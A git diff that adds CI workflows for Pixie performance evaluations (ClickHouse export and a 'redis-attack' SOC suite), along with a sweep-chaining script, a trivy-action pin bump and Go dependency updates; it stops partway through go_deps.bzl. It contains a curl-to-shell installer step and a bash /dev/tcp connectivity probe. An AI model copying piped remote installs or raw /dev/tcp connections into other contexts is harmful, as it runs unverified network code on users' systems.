diff --git a/.github/workflows/perf_clickhouse.yaml b/.github/workflows/perf_clickhouse.yaml new file mode 100644 index 00000000000..e3f34671652 --- /dev/null +++ b/.github/workflows/perf_clickhouse.yaml @@ -0,0 +1,158 @@ +--- +name: perf-eval-clickhouse +on: + workflow_dispatch: + inputs: + ref: + description: 'Branch or commit' + required: false + type: string + tags: + description: 'Tags (comma separated)' + required: false + type: string +permissions: + contents: read + packages: write +jobs: + get-dev-image-with-extras: + uses: ./.github/workflows/get_image.yaml + with: + image-base-name: "dev_image_with_extras" + ref: ${{ inputs.ref }} + + clickhouse-export-perf: + name: ClickHouse export perf eval + needs: get-dev-image-with-extras + runs-on: oracle-vm-16cpu-64gb-x86-64 + container: + image: ${{ needs.get-dev-image-with-extras.outputs.image-with-tag }} + options: --cap-add=NET_ADMIN --device=/dev/net/tun + steps: + - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 + with: + ref: ${{ inputs.ref }} + fetch-depth: 0 + - name: Add pwd to git safe dir + run: git config --global --add safe.directory `pwd` + - id: get-commit-sha + run: echo "commit-sha=$(git rev-parse --short HEAD)" >> $GITHUB_OUTPUT + + # TODO(ddelnano): swap TAILSCALE_AUTH_KEY for an OAuth client once one is + # provisioned in the k8sstormcenter tailnet. Use + # `tailscale/github-action@v2` with `oauth-client-id` and `oauth-secret` + # inputs (`TS_OAUTH_CLIENT_ID` / `TS_OAUTH_CLIENT_SECRET` secrets) so + # credentials rotate automatically instead of expiring on a fixed cadence. + - name: Start Tailscale sidecar + env: + TS_AUTHKEY: ${{ secrets.TAILSCALE_AUTH_KEY }} + run: | + curl -fsSL https://tailscale.com/install.sh | sh + mkdir -p /var/run/tailscale /var/lib/tailscale + tailscaled \ + --socket=/var/run/tailscale/tailscaled.sock \ + --state=/var/lib/tailscale/tailscaled.state & + until tailscale status --json >/dev/null 2>&1; do sleep 1; done + tailscale up \ + --authkey="${TS_AUTHKEY}" \ + --accept-routes \ + --hostname="pixie-perf-ci-${GITHUB_RUN_ID}" + + - name: Write kubeconfig + env: + KUBECONFIG_B64: ${{ secrets.KUBECONFIG_B64 }} + run: | + mkdir -p "${RUNNER_TEMP}" + echo "${KUBECONFIG_B64}" | base64 -d > "${RUNNER_TEMP}/kubeconfig" + chmod 600 "${RUNNER_TEMP}/kubeconfig" + + # Fail fast if Tailscale can't reach the cluster API, before the 2+ minute + # bazel/skaffold build wastes time. 
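+      # For reference, the TCP check in the probe below relies on bash's
+      # /dev/tcp pseudo-device, so no netcat is needed in the image; e.g.
+      #   timeout 5 bash -c "</dev/tcp/1.2.3.4/6443"
+      # (illustrative address) exits 0 only if a TCP handshake to that
+      # host:port completes within the timeout.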
+      - name: Tailscale connectivity probe
+        env:
+          KUBECONFIG: ${{ runner.temp }}/kubeconfig
+        run: |
+          tailscale status
+          tailscale netcheck
+          api_host="$(kubectl --kubeconfig="$KUBECONFIG" config view --minify -o jsonpath='{.clusters[0].cluster.server}' | sed -E 's|https?://||; s|/.*||')"
+          api_ip="${api_host%%:*}"
+          api_port="${api_host##*:}"
+          echo "--- tailscale ping ${api_ip} ---"
+          tailscale ping --c 3 --until-direct=false "${api_ip}" || true
+          echo "--- tcp probe ${api_ip}:${api_port} ---"
+          timeout 5 bash -c "</dev/tcp/${api_ip}/${api_port}"
+
+      - name: Write gcloud service account key
+        id: gcloud-creds
+        env:
+          # Secret name assumed; mirrors the KUBECONFIG_B64 convention above.
+          GCLOUD_SA_KEY_B64: ${{ secrets.GCLOUD_SA_KEY_B64 }}
+        run: |
+          echo "${GCLOUD_SA_KEY_B64}" | base64 -d > /tmp/gcloud.json
+          chmod 600 /tmp/gcloud.json
+          echo "gcloud-creds=/tmp/gcloud.json" >> $GITHUB_OUTPUT
+
+      - name: Activate gcloud service account
+        env:
+          GOOGLE_APPLICATION_CREDENTIALS: ${{ steps.gcloud-creds.outputs.gcloud-creds }}
+        run: |
+          service_account="$(jq -r '.client_email' "$GOOGLE_APPLICATION_CREDENTIALS")"
+          gcloud auth activate-service-account "${service_account}" --key-file="$GOOGLE_APPLICATION_CREDENTIALS"
+          gcloud auth configure-docker
+
+      - name: Log in to GHCR
+        env:
+          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+        run: echo "${GH_TOKEN}" | docker login ghcr.io -u "${{ github.actor }}" --password-stdin
+
+      - name: Build and install px CLI
+        run: |
+          bazel build --config=x86_64_sysroot //src/pixie_cli:px
+          install -m 0755 bazel-bin/src/pixie_cli/px_/px /usr/local/bin/px
+          px version
+
+      - name: Run clickhouse-export perf
+        env:
+          PX_API_KEY: ${{ secrets.PX_API_KEY }}
+          GOOGLE_APPLICATION_CREDENTIALS: ${{ steps.gcloud-creds.outputs.gcloud-creds }}
+          KUBECONFIG: ${{ runner.temp }}/kubeconfig
+        run: |
+          bazel run //src/e2e_test/perf_tool:perf_tool -- run \
+            --api_key="${PX_API_KEY}" \
+            --cloud_addr=pixie.austrianopencloudcommunity.org:443 \
+            --commit_sha="${{ steps.get-commit-sha.outputs.commit-sha }}" \
+            --experiment_name=clickhouse-export \
+            --suite=clickhouse-exec \
+            --use_local_cluster \
+            --export_backend=parquet-gcs \
+            --gcs_bucket=k8sstormcenter-soc-perf \
+            --container_repo=ghcr.io/k8sstormcenter \
+            --prom_recorder_override 'clickhouse-operator=:k8ss-forensic' \
+            --tags "${{ inputs.tags }}"
+
+      - name: Upload skaffold stderr log
+        if: always()
+        uses: actions/upload-artifact@ea165f8d65b6e75b540449e92b4886f43607fa02 # v4.6.2
+        with:
+          name: skaffold-stderr-${{ github.run_id }}-${{ github.run_attempt }}
+          path: ${{ runner.temp }}/skaffold-stderr.log
+          if-no-files-found: ignore
+
+      - name: Deactivate gcloud service account
+        if: always()
+        run: gcloud auth revoke || true
+
+      - name: Tailscale logout
+        if: always()
+        run: tailscale logout || true
diff --git a/.github/workflows/perf_soc_attack.yaml b/.github/workflows/perf_soc_attack.yaml
new file mode 100644
index 00000000000..38305c7890c
--- /dev/null
+++ b/.github/workflows/perf_soc_attack.yaml
@@ -0,0 +1,159 @@
+---
+name: perf-eval-soc-attack
+on:
+  workflow_dispatch:
+    inputs:
+      ref:
+        description: 'Branch or commit'
+        required: false
+        type: string
+      tags:
+        description: 'Tags (comma separated)'
+        required: false
+        type: string
+permissions:
+  contents: read
+  packages: write
+jobs:
+  get-dev-image-with-extras:
+    uses: ./.github/workflows/get_image.yaml
+    with:
+      image-base-name: "dev_image_with_extras"
+      ref: ${{ inputs.ref }}
+
+  soc-attack-perf:
+    name: Sovereign SOC redis-attack perf eval
+    needs: get-dev-image-with-extras
+    runs-on: oracle-vm-16cpu-64gb-x86-64
+    container:
+      image: ${{ needs.get-dev-image-with-extras.outputs.image-with-tag }}
+      options: --cap-add=NET_ADMIN --device=/dev/net/tun
+    steps:
+      - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2
+        with:
+          ref: ${{ inputs.ref }}
+          fetch-depth: 0
+      - name: Add pwd to git safe dir
+        run: git config --global --add safe.directory `pwd`
+      - id: get-commit-sha
+        run: echo "commit-sha=$(git rev-parse --short HEAD)" >> $GITHUB_OUTPUT
+
+      # TODO(ddelnano): swap TAILSCALE_AUTH_KEY for an OAuth client once one is
+      # provisioned in the k8sstormcenter tailnet. Use
+      # `tailscale/github-action@v2` with `oauth-client-id` and `oauth-secret`
+      # inputs (`TS_OAUTH_CLIENT_ID` / `TS_OAUTH_CLIENT_SECRET` secrets) so
+      # credentials rotate automatically instead of expiring on a fixed cadence.
+      - name: Start Tailscale sidecar
+        env:
+          TS_AUTHKEY: ${{ secrets.TAILSCALE_AUTH_KEY }}
+        run: |
+          curl -fsSL https://tailscale.com/install.sh | sh
+          mkdir -p /var/run/tailscale /var/lib/tailscale
+          tailscaled \
+            --socket=/var/run/tailscale/tailscaled.sock \
+            --state=/var/lib/tailscale/tailscaled.state &
+          until tailscale status --json >/dev/null 2>&1; do sleep 1; done
+          tailscale up \
+            --authkey="${TS_AUTHKEY}" \
+            --accept-routes \
+            --hostname="pixie-perf-ci-${GITHUB_RUN_ID}"
+
+      - name: Write kubeconfig
+        env:
+          KUBECONFIG_B64: ${{ secrets.KUBECONFIG_B64 }}
+        run: |
+          mkdir -p "${RUNNER_TEMP}"
+          echo "${KUBECONFIG_B64}" | base64 -d > "${RUNNER_TEMP}/kubeconfig"
+          chmod 600 "${RUNNER_TEMP}/kubeconfig"
+
+      # Fail fast if Tailscale can't reach the cluster API, before the 2+ minute
+      # bazel/skaffold build wastes time.
+      - name: Tailscale connectivity probe
+        env:
+          KUBECONFIG: ${{ runner.temp }}/kubeconfig
+        run: |
+          tailscale status
+          tailscale netcheck
+          api_host="$(kubectl --kubeconfig="$KUBECONFIG" config view --minify -o jsonpath='{.clusters[0].cluster.server}' | sed -E 's|https?://||; s|/.*||')"
+          api_ip="${api_host%%:*}"
+          api_port="${api_host##*:}"
+          echo "--- tailscale ping ${api_ip} ---"
+          tailscale ping --c 3 --until-direct=false "${api_ip}" || true
+          echo "--- tcp probe ${api_ip}:${api_port} ---"
+          timeout 5 bash -c "</dev/tcp/${api_ip}/${api_port}"
+
+      - name: Write gcloud service account key
+        id: gcloud-creds
+        env:
+          # Secret name assumed; mirrors the KUBECONFIG_B64 convention above.
+          GCLOUD_SA_KEY_B64: ${{ secrets.GCLOUD_SA_KEY_B64 }}
+        run: |
+          echo "${GCLOUD_SA_KEY_B64}" | base64 -d > /tmp/gcloud.json
+          chmod 600 /tmp/gcloud.json
+          echo "gcloud-creds=/tmp/gcloud.json" >> $GITHUB_OUTPUT
+
+      - name: Activate gcloud service account
+        env:
+          GOOGLE_APPLICATION_CREDENTIALS: ${{ steps.gcloud-creds.outputs.gcloud-creds }}
+        run: |
+          service_account="$(jq -r '.client_email' "$GOOGLE_APPLICATION_CREDENTIALS")"
+          gcloud auth activate-service-account "${service_account}" --key-file="$GOOGLE_APPLICATION_CREDENTIALS"
+          gcloud auth configure-docker
+
+      - name: Log in to GHCR
+        env:
+          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+        run: echo "${GH_TOKEN}" | docker login ghcr.io -u "${{ github.actor }}" --password-stdin
+
+      - name: Build and install px CLI
+        run: |
+          bazel build --config=x86_64_sysroot //src/pixie_cli:px
+          install -m 0755 bazel-bin/src/pixie_cli/px_/px /usr/local/bin/px
+          px version
+
+      # The sovereign-soc suite installs Kubescape + Vector on the experiment
+      # cluster as part of the run (see KubescapeVectorWorkload). The
+      # kubescape-operator chart is pre-rendered under
+      # src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/
+      # and applied via PrerenderedDeploy, so no extra ./scripts step is needed.
+      #
+      # ClickHouse operator metrics are scraped on the forensic cluster via
+      # the prom_recorder_override; the kubescape node-agent prom recorder
+      # is intentionally NOT overridden — kubescape runs on the experiment
+      # cluster (where redis+bobctl drive traffic), so the recorder uses the
+      # default kubeconfig.
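+      # SOC_VIZIER_EXISTING=1 below follows the same contract local-ci.sh
+      # phase 9 documents: reuse the Vizier already deployed on the target
+      # cluster rather than re-running `px deploy` plus a skaffold rebuild.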
+      - name: Run sovereign-soc redis-attack perf
+        env:
+          PX_API_KEY: ${{ secrets.PX_API_KEY }}
+          GOOGLE_APPLICATION_CREDENTIALS: ${{ steps.gcloud-creds.outputs.gcloud-creds }}
+          KUBECONFIG: ${{ runner.temp }}/kubeconfig
+          SOC_VIZIER_EXISTING: "1"
+        run: |
+          bazel run //src/e2e_test/perf_tool:perf_tool -- run \
+            --api_key="${PX_API_KEY}" \
+            --cloud_addr=pixie.austrianopencloudcommunity.org:443 \
+            --commit_sha="${{ steps.get-commit-sha.outputs.commit-sha }}" \
+            --experiment_name=redis-attack \
+            --suite=sovereign-soc \
+            --use_local_cluster \
+            --export_backend=parquet-gcs \
+            --gcs_bucket=k8sstormcenter-soc-perf \
+            --container_repo=ghcr.io/k8sstormcenter \
+            --prom_recorder_override 'clickhouse-operator=:k8ss-forensic' \
+            --max_retries=1 \
+            --tags "${{ inputs.tags }}"
+
+      - name: Tailscale logout
+        if: always()
+        run: tailscale logout || true
diff --git a/.github/workflows/trivy_fs.yaml b/.github/workflows/trivy_fs.yaml
index 6e43472a835..b1edec30f2f 100644
--- a/.github/workflows/trivy_fs.yaml
+++ b/.github/workflows/trivy_fs.yaml
@@ -23,7 +23,9 @@ jobs:
       security-events: write
     steps:
       - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2
-      - uses: aquasecurity/trivy-action@18f2510ee396bbf400402947b394f2dd8c87dbb0 # v0.29.0
+      # v0.36.0 released 2026-04-22 (post-incident). Internally SHA-pins
+      # setup-trivy@3fb12ec = Aqua's safe v0.2.6 per GHSA-69fq-xp46-6x23.
+      - uses: aquasecurity/trivy-action@ed142fd0673e97e23eac54620cfb913e5ce36c25 # v0.36.0
         with:
           scan-type: 'fs'
           ignore-unfixed: true
diff --git a/chained-sweep.sh b/chained-sweep.sh
new file mode 100755
index 00000000000..e20afa45e46
--- /dev/null
+++ b/chained-sweep.sh
@@ -0,0 +1,48 @@
+#!/usr/bin/env bash
+# chained-sweep.sh — wait for an in-flight perf-sweep to finish, then kick
+# off a second (independent) sweep into a fresh /tmp/perf-sweep-<ts>/ dir
+# with its own watcher. Use this when you want a clean before/after pair
+# without having to be at the keyboard when the first one ends.
+#
+# Usage:
+#   ./chained-sweep.sh <first-sweep-dir>
+#   ./chained-sweep.sh /tmp/perf-sweep-20260514-114224
+set -euo pipefail
+
+FIRST="${1:?need path to first sweep dir}"
+LOG=/tmp/chained-sweep.log
+exec > >(tee -a "$LOG") 2>&1
+
+echo "$(date -Is) waiting for first sweep to finish: $FIRST"
+# perf-sweep.sh writes "sweep complete in N s — <dir>" as the last line
+# of sweep.log when all multipliers landed.
+while ! grep -q "sweep complete" "$FIRST/sweep.log" 2>/dev/null; do
+  sleep 30
+done
+echo "$(date -Is) first sweep finished"
+
+# Kick off second sweep (perf-sweep.sh creates its own timestamped dir).
+# Tag the sweep.log with a header so it's obvious in the watcher output
+# that this is the "after" run.
+echo "$(date -Is) launching second sweep"
+/home/constanze/code/pixie/perf-sweep.sh > /tmp/perf-sweep-second.stdout 2>&1 &
+SWEEP_PID=$!
+
+# Give perf-sweep.sh a moment to create its dir + sweep.log.
+sleep 8
+NEW=$(ls -dt /tmp/perf-sweep-2*/ 2>/dev/null | head -1)
+NEW="${NEW%/}"
+if [[ -z "$NEW" || "$NEW" == "$FIRST" ]]; then
+  echo "$(date -Is) ERROR: second sweep dir not detected"
+  exit 1
+fi
+echo "$(date -Is) second sweep dir: $NEW"
+
+# Watcher for the new sweep (auto-exits when its sweep.log shows complete).
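+# setsid puts the watcher in its own session and </dev/null detaches its
+# stdin, so it keeps running after this script and its terminal are gone.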
+setsid bash /home/constanze/code/pixie/render-sweep-watch.sh "$NEW" \
+  </dev/null >/tmp/render-watch-second.log 2>&1 &
+disown
+echo "$(date -Is) watcher launched for $NEW"
+
+wait "$SWEEP_PID"
+echo "$(date -Is) second sweep done"
diff --git a/docker.properties b/docker.properties
index bb7696c727f..4633b5f35bf 100644
--- a/docker.properties
+++ b/docker.properties
@@ -1,4 +1,4 @@
-DOCKER_IMAGE_TAG=202512082352
-LINTER_IMAGE_DIGEST=441fc5a65697dab0b38627d5afde9e38da6812f1a5b98732b224161c23238e73
-DEV_IMAGE_DIGEST=cac2e8a1c3e70dde4e5089b2383b2e11cc022af467ee430c12416eb42066fbb7
-DEV_IMAGE_WITH_EXTRAS_DIGEST=e84f82d62540e1ca72650f8f7c9c4fe0b32b64a33f04cf0b913b9961527c9e30
+DOCKER_IMAGE_TAG=202604270358
+LINTER_IMAGE_DIGEST=af984e837756bce44089d0f977146aee989b24a12884ba2366b4e6eaf19d9acb
+DEV_IMAGE_DIGEST=e4aec14294cff907e7dc3c4835950a4e166e503d32cae082418971e7f70d86bc
+DEV_IMAGE_WITH_EXTRAS_DIGEST=331a2391941c589d2b6536ae49794460b1097c482a45a11029d96a7d0d8d8030
diff --git a/go.mod b/go.mod
index 4224503b9c1..10f19e7657b 100644
--- a/go.mod
+++ b/go.mod
@@ -52,6 +52,7 @@ require (
 	github.com/ory/dockertest/v3 v3.8.1
 	github.com/ory/hydra-client-go v1.9.2
 	github.com/ory/kratos-client-go v0.10.1
+	github.com/parquet-go/parquet-go v0.25.1
 	github.com/phayes/freeport v0.0.0-20171002181615-b8543db493a5
 	github.com/prometheus/client_golang v1.14.0
 	github.com/prometheus/client_model v0.3.0
@@ -115,6 +116,7 @@ require (
 	github.com/VividCortex/ewma v1.1.1 // indirect
 	github.com/a8m/envsubst v1.3.0 // indirect
 	github.com/alecthomas/participle/v2 v2.0.0-beta.5 // indirect
+	github.com/andybalholm/brotli v1.1.0 // indirect
 	github.com/andybalholm/cascadia v1.1.0 // indirect
 	github.com/asaskevich/govalidator v0.0.0-20230301143203-a9d515a09cc2 // indirect
 	github.com/beorn7/perks v1.0.1 // indirect
@@ -171,7 +173,7 @@ require (
 	github.com/google/go-querystring v1.1.0 // indirect
 	github.com/google/gofuzz v1.2.0 // indirect
 	github.com/google/shlex v0.0.0-20191202100458-e7afc7fbc510 // indirect
-	github.com/google/uuid v1.3.0 // indirect
+	github.com/google/uuid v1.6.0 // indirect
 	github.com/googleapis/gax-go/v2 v2.7.0 // indirect
 	github.com/gorilla/securecookie v1.1.1 // indirect
 	github.com/gorilla/websocket v1.5.0 // indirect
@@ -191,7 +193,7 @@ require (
 	github.com/json-iterator/go v1.1.12 // indirect
 	github.com/jstemmer/go-junit-report v0.9.1 // indirect
 	github.com/kevinburke/ssh_config v0.0.0-20190725054713-01f96b0aa0cd // indirect
-	github.com/klauspost/compress v1.17.2 // indirect
+	github.com/klauspost/compress v1.17.9 // indirect
 	github.com/kr/pretty v0.2.1 // indirect
 	github.com/kr/text v0.2.0 // indirect
 	github.com/kylelemons/godebug v1.1.0 // indirect
@@ -232,6 +234,7 @@ require (
 	github.com/patrickmn/go-cache v2.1.0+incompatible // indirect
 	github.com/pelletier/go-toml v1.9.3 // indirect
 	github.com/peterbourgon/diskv v2.0.1+incompatible // indirect
+	github.com/pierrec/lz4/v4 v4.1.21 // indirect
 	github.com/pkg/errors v0.9.1 // indirect
 	github.com/pmezard/go-difflib v1.0.0 // indirect
 	github.com/prometheus/procfs v0.9.0 // indirect
@@ -276,7 +279,7 @@ require (
 	golang.org/x/xerrors v0.0.0-20220907171357-04be3eba64a2 // indirect
 	gomodules.xyz/jsonpatch/v2 v2.2.0 // indirect
 	google.golang.org/appengine v1.6.7 // indirect
-	google.golang.org/protobuf v1.29.1 // indirect
+	google.golang.org/protobuf v1.34.2 // indirect
 	gopkg.in/inf.v0 v0.9.1 // indirect
 	gopkg.in/ini.v1 v1.67.0 // indirect
 	gopkg.in/launchdarkly/go-jsonstream.v1 v1.0.1 // indirect
@@ -317,3 +320,5 @@ replace (
 	google.golang.org/grpc =>
google.golang.org/grpc v1.43.0 gopkg.in/yaml.v2 => gopkg.in/yaml.v2 v2.4.0 ) + +replace google.golang.org/protobuf => google.golang.org/protobuf v1.29.1 diff --git a/go.sum b/go.sum index b8697cb4add..533a9f3f9b6 100644 --- a/go.sum +++ b/go.sum @@ -87,6 +87,8 @@ github.com/alecthomas/template v0.0.0-20190718012654-fb15b899a751/go.mod h1:LOuy github.com/alecthomas/units v0.0.0-20151022065526-2efee857e7cf/go.mod h1:ybxpYRFXyAe+OPACYpWeL0wqObRcbAqCMya13uyzqw0= github.com/alecthomas/units v0.0.0-20190717042225-c3de453c63f4/go.mod h1:ybxpYRFXyAe+OPACYpWeL0wqObRcbAqCMya13uyzqw0= github.com/alecthomas/units v0.0.0-20190924025748-f65c72e2690d/go.mod h1:rBZYJk541a8SKzHPHnH3zbiI+7dagKZ0cgpgrD7Fyho= +github.com/andybalholm/brotli v1.1.0 h1:eLKJA0d02Lf0mVpIDgYnqXcUn0GqVmEFny3VuID1U3M= +github.com/andybalholm/brotli v1.1.0/go.mod h1:sms7XGricyQI9K10gOSf56VKKWS4oLer58Q+mhRPtnY= github.com/andybalholm/cascadia v1.1.0 h1:BuuO6sSfQNFRu1LppgbD25Hr2vLYW25JvxHs5zzsLTo= github.com/andybalholm/cascadia v1.1.0/go.mod h1:GsXiBklL0woXo1j/WYWtSYYC4ouU9PqHO0sqidkEA4Y= github.com/anmitsu/go-shlex v0.0.0-20161002113705-648efa622239 h1:kFOfPq6dUM1hTo4JG6LR5AXSUEsOjtdm0kw0FtQtMJA= @@ -447,8 +449,8 @@ github.com/google/shlex v0.0.0-20191202100458-e7afc7fbc510 h1:El6M4kTTCOh6aBiKaU github.com/google/shlex v0.0.0-20191202100458-e7afc7fbc510/go.mod h1:pupxD2MaaD3pAXIBCelhxNneeOaAeabZDe5s4K6zSpQ= github.com/google/uuid v1.1.1/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= github.com/google/uuid v1.1.2/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= -github.com/google/uuid v1.3.0 h1:t6JiXgmwXMjEs8VusXIJk2BXHsn+wx8BZdTaoZ5fu7I= -github.com/google/uuid v1.3.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= +github.com/google/uuid v1.6.0 h1:NIvaJDMOsjHA8n1jAhLSgzrAzy1Hgr+hNrb57e+94F0= +github.com/google/uuid v1.6.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= github.com/googleapis/gax-go/v2 v2.0.5/go.mod h1:DWXyrwAJ9X0FpwwEdw+IPEYBICEFu5mhpdKc/us6bOk= github.com/googleapis/gax-go/v2 v2.7.0 h1:IcsPKeInNvYi7eqSaDjiZqDDKu5rsmunY0Y1YupQSSQ= github.com/googleapis/gax-go/v2 v2.7.0/go.mod h1:TEop28CZZQ2y+c0VxMUmu1lV+fQx57QpBWsYpwqHJx8= @@ -579,8 +581,8 @@ github.com/klauspost/compress v1.8.2/go.mod h1:RyIbtBH6LamlWaDj8nUwkbUhJ87Yi3uG0 github.com/klauspost/compress v1.9.0/go.mod h1:RyIbtBH6LamlWaDj8nUwkbUhJ87Yi3uG0guNDohfE1A= github.com/klauspost/compress v1.9.5/go.mod h1:RyIbtBH6LamlWaDj8nUwkbUhJ87Yi3uG0guNDohfE1A= github.com/klauspost/compress v1.13.6/go.mod h1:/3/Vjq9QcHkK5uEr5lBEmyoZ1iFhe47etQ6QUkpK6sk= -github.com/klauspost/compress v1.17.2 h1:RlWWUY/Dr4fL8qk9YG7DTZ7PDgME2V4csBXA8L/ixi4= -github.com/klauspost/compress v1.17.2/go.mod h1:ntbaceVETuRiXiv4DpjP66DpAtAGkEQskQzEyD//IeE= +github.com/klauspost/compress v1.17.9 h1:6KIumPrER1LHsvBVuDa0r5xaG0Es51mhhB9BQB2qeMA= +github.com/klauspost/compress v1.17.9/go.mod h1:Di0epgTjJY877eYKx5yC51cX2A2Vl2ibi7bDH9ttBbw= github.com/klauspost/cpuid v1.2.1/go.mod h1:Pj4uuM528wm8OyEC2QMXAi2YiTZ96dNQPGgoMS4s3ek= github.com/konsorten/go-windows-terminal-sequences v1.0.1/go.mod h1:T0+1ngSBFLxvqU3pZ+m/2kptfBszLMUkC4ZK/EgS/cQ= github.com/konsorten/go-windows-terminal-sequences v1.0.2/go.mod h1:T0+1ngSBFLxvqU3pZ+m/2kptfBszLMUkC4ZK/EgS/cQ= @@ -775,6 +777,8 @@ github.com/ory/hydra-client-go v1.9.2 h1:sbp+8zwEJvhqSxcY8HiOkXeY2FspsfSOJ5ajJ07 github.com/ory/hydra-client-go v1.9.2/go.mod h1:TTg4Gt0SDC8+XoGtj5qzdtqxapfFW+Vmm41PFuC6n/E= github.com/ory/kratos-client-go v0.10.1 h1:kSRk+0leCJ1nPMS+FPho8b9WMzrKNpgszvta0Xo32QU= github.com/ory/kratos-client-go v0.10.1/go.mod 
h1:dOQIsar76K07wMPJD/6aMhrWyY+sFGEagLDLso1CpsA= +github.com/parquet-go/parquet-go v0.25.1 h1:l7jJwNM0xrk0cnIIptWMtnSnuxRkwq53S+Po3KG8Xgo= +github.com/parquet-go/parquet-go v0.25.1/go.mod h1:AXBuotO1XiBtcqJb/FKFyjBG4aqa3aQAAWF3ZPzCanY= github.com/pascaldekloe/goe v0.0.0-20180627143212-57f6aae5913c/go.mod h1:lzWF7FIEvWOWxwDKqyGYQf6ZUaNfKdP144TG7ZOy1lc= github.com/patrickmn/go-cache v2.1.0+incompatible h1:HRMgzkcYKYpi3C8ajMPV8OFXaaRUnok+kx1WdO15EQc= github.com/patrickmn/go-cache v2.1.0+incompatible/go.mod h1:3Qf8kWWT7OJRJbdiICTKqZju1ZixQ/KpMGzzAfe6+WQ= @@ -788,6 +792,8 @@ github.com/peterbourgon/diskv v2.0.1+incompatible h1:UBdAOUP5p4RWqPBg048CAvpKN+v github.com/peterbourgon/diskv v2.0.1+incompatible/go.mod h1:uqqh8zWWbv1HBMNONnaR/tNboyR3/BZd58JJSHlUSCU= github.com/phayes/freeport v0.0.0-20171002181615-b8543db493a5 h1:rZQtoozkfsiNs36c7Tdv/gyGNzD1X1XWKO8rptVNZuM= github.com/phayes/freeport v0.0.0-20171002181615-b8543db493a5/go.mod h1:iIss55rKnNBTvrwdmkUpLnDpZoAHvWaiq5+iMmen4AE= +github.com/pierrec/lz4/v4 v4.1.21 h1:yOVMLb6qSIDP67pl/5F7RepeKYu/VmTyEXvuMI5d9mQ= +github.com/pierrec/lz4/v4 v4.1.21/go.mod h1:gZWDp/Ze/IJXGXf23ltt2EXimqmTUXEy0GFuRQyBid4= github.com/pingcap/errors v0.11.4 h1:lFuQV/oaUMGcD2tqt+01ROSmJs75VG1ToEOkZIZ4nE4= github.com/pingcap/errors v0.11.4/go.mod h1:Oi8TUi2kEtXXLMJk9l1cGmz20kV3TaQ0usTwv5KuLY8= github.com/pkg/diff v0.0.0-20210226163009-20ebb0f2a09e h1:aoZm08cpOy4WuID//EZDgcC4zIxODThtZNPirFr42+A= @@ -1327,10 +1333,6 @@ google.golang.org/genproto v0.0.0-20211208223120-3a66f561d7aa h1:I0YcKz0I7OAhddo google.golang.org/genproto v0.0.0-20211208223120-3a66f561d7aa/go.mod h1:5CzLGKJ67TSI2B9POpiiyGha0AjJvZIUgRMt1dSmuhc= google.golang.org/grpc v1.43.0 h1:Eeu7bZtDZ2DpRCsLhUlcrLnvYaMK1Gz86a+hMVvELmM= google.golang.org/grpc v1.43.0/go.mod h1:k+4IHHFw41K8+bbowsex27ge2rCb65oeWqe4jJ590SU= -google.golang.org/protobuf v1.23.0/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU= -google.golang.org/protobuf v1.25.0/go.mod h1:9JNX74DMeImyA3h4bdi1ymwjUzf21/xIlbajtzgsN7c= -google.golang.org/protobuf v1.26.0/go.mod h1:9q0QmTI4eRPtz6boOQmLYwt+qCgq0jsYwAQnmE0givc= -google.golang.org/protobuf v1.27.1/go.mod h1:9q0QmTI4eRPtz6boOQmLYwt+qCgq0jsYwAQnmE0givc= google.golang.org/protobuf v1.29.1 h1:7QBf+IK2gx70Ap/hDsOmam3GE0v9HicjfEdAxE62UoM= google.golang.org/protobuf v1.29.1/go.mod h1:HV8QOd/L58Z+nl8r43ehVNZIU/HEI6OcFqwMG9pJV4I= gopkg.in/alecthomas/kingpin.v2 v2.2.6/go.mod h1:FMv+mEhP44yOT+4EoQTLFTRgOQ1FBLkstjWtayDeSgw= diff --git a/go_deps.bzl b/go_deps.bzl index 6590dff5052..8ff37dbcbf6 100644 --- a/go_deps.bzl +++ b/go_deps.bzl @@ -156,8 +156,8 @@ def pl_go_dependencies(): name = "com_github_andybalholm_brotli", build_directives = ["gazelle:map_kind go_binary pl_go_binary @px//bazel:pl_build_system.bzl", "gazelle:map_kind go_test pl_go_test @px//bazel:pl_build_system.bzl"], importpath = "github.com/andybalholm/brotli", - sum = "h1:8uQZIdzKmjc/iuPu7O2ioW48L81FgatrcpfFmiq/cCs=", - version = "v1.0.5", + sum = "h1:eLKJA0d02Lf0mVpIDgYnqXcUn0GqVmEFny3VuID1U3M=", + version = "v1.1.0", ) go_repository( name = "com_github_andybalholm_cascadia", @@ -1628,8 +1628,8 @@ def pl_go_dependencies(): name = "com_github_google_uuid", build_directives = ["gazelle:map_kind go_binary pl_go_binary @px//bazel:pl_build_system.bzl", "gazelle:map_kind go_test pl_go_test @px//bazel:pl_build_system.bzl"], importpath = "github.com/google/uuid", - sum = "h1:t6JiXgmwXMjEs8VusXIJk2BXHsn+wx8BZdTaoZ5fu7I=", - version = "v1.3.0", + sum = "h1:NIvaJDMOsjHA8n1jAhLSgzrAzy1Hgr+hNrb57e+94F0=", + version = "v1.6.0", ) go_repository( name = 
